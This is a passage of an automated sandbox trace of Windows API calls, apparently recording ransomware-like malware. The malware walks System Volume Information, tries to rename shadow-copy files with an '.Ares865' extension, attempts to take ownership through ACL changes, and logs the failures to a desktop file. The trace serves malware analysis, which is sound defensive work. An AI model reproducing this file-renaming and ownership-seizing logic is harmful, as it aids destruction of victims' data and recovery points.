nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.547] SetEntriesInAclW () returned 0x0 [0112.547] SetNamedSecurityInfoW () returned 0x5 [0112.548] SetNamedSecurityInfoW () returned 0x5 [0112.548] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.548] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 110 [0112.548] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 110 [0112.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.549] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8e2c [0112.549] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x6e, lpOverlapped=0x0) returned 1 [0112.549] CloseHandle (hObject=0x118) returned 1 [0112.549] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.549] CloseHandle (hObject=0x0) returned 0 [0112.549] CloseHandle (hObject=0x0) returned 0 [0112.549] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7477cf60, ftCreationTime.dwHighDateTime=0x1d301bd, ftLastAccessTime.dwLowDateTime=0x7477cf60, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xe6ee95f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a3b4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{5A03E~1")) returned 1 [0112.550] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.550] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.550] GetLastError () returned 0x5 [0112.550] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.550] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.550] SetEntriesInAclW () returned 0x0 [0112.550] SetNamedSecurityInfoW () returned 0x5 [0112.550] SetNamedSecurityInfoW () returned 0x5 [0112.550] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.550] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.550] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{5a03eaea-6daf-11e7-b9a9-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.551] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8e9a [0112.551] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.551] CloseHandle (hObject=0x118) returned 1 [0112.551] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.552] CloseHandle (hObject=0x0) returned 0 [0112.552] CloseHandle (hObject=0x0) returned 0 [0112.552] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6eadf560, ftCreationTime.dwHighDateTime=0x1d2fafa, ftLastAccessTime.dwLowDateTime=0x6eadf560, ftLastAccessTime.dwHighDateTime=0x1d2fafa, ftLastWriteTime.dwLowDateTime=0xa8b13a10, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfd58000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{5C1EC~1")) returned 1 [0112.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.552] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.552] GetLastError () returned 0x5 [0112.552] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.552] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.552] SetEntriesInAclW () returned 0x0 [0112.552] SetNamedSecurityInfoW () returned 0x5 [0112.552] SetNamedSecurityInfoW () returned 0x5 [0112.552] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.552] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.552] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{5c1ec902-668e-11e7-870f-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.553] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f2e [0112.553] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.553] CloseHandle (hObject=0x118) returned 1 [0112.554] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.554] CloseHandle (hObject=0x0) returned 0 [0112.554] CloseHandle (hObject=0x0) returned 0 [0112.554] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7697dec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7697dec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe27e1a90, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x5de8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{7381D~1")) returned 1 [0112.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.554] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.554] GetLastError () returned 0x5 [0112.554] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.554] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.554] SetEntriesInAclW () returned 0x0 [0112.554] SetNamedSecurityInfoW () returned 0x5 [0112.554] SetNamedSecurityInfoW () returned 0x5 [0112.554] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.554] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.554] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{7381dc5b-4993-11e7-87dc-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.555] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8fc2 [0112.555] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.556] CloseHandle (hObject=0x118) returned 1 [0112.556] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.556] CloseHandle (hObject=0x0) returned 0 [0112.556] CloseHandle (hObject=0x0) returned 0 [0112.556] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe44a8f70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe44a8f70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4106b380, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x43130000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{8456A~1")) returned 1 [0112.556] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.556] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.556] GetLastError () returned 0x5 [0112.556] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.556] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.556] SetEntriesInAclW () returned 0x0 [0112.556] SetNamedSecurityInfoW () returned 0x5 [0112.557] SetNamedSecurityInfoW () returned 0x5 [0112.557] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.557] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.557] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{8456a7db-6db1-11e7-9a97-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.557] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9056 [0112.557] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.558] CloseHandle (hObject=0x118) returned 1 [0112.558] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.558] CloseHandle (hObject=0x0) returned 0 [0112.558] CloseHandle (hObject=0x0) returned 0 [0112.558] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x844c8920, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x844c8920, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x9c44e360, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xa374000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{9625B~1")) returned 1 [0112.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.558] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.558] GetLastError () returned 0x5 [0112.558] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.558] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.559] SetEntriesInAclW () returned 0x0 [0112.559] SetNamedSecurityInfoW () returned 0x5 [0112.559] SetNamedSecurityInfoW () returned 0x5 [0112.559] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.559] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.559] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625b7da-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.559] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x90ea [0112.559] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.560] CloseHandle (hObject=0x118) returned 1 [0112.560] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.560] CloseHandle (hObject=0x0) returned 0 [0112.560] CloseHandle (hObject=0x0) returned 0 [0112.560] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9a0e5c20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x9a0e5c20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xec7fc480, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xdd74000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{9625B~2")) returned 1 [0112.560] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.560] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.560] GetLastError () returned 0x5 [0112.560] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.561] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.561] SetEntriesInAclW () returned 0x0 [0112.561] SetNamedSecurityInfoW () returned 0x5 [0112.561] SetNamedSecurityInfoW () returned 0x5 [0112.561] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.561] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.561] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625b905-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 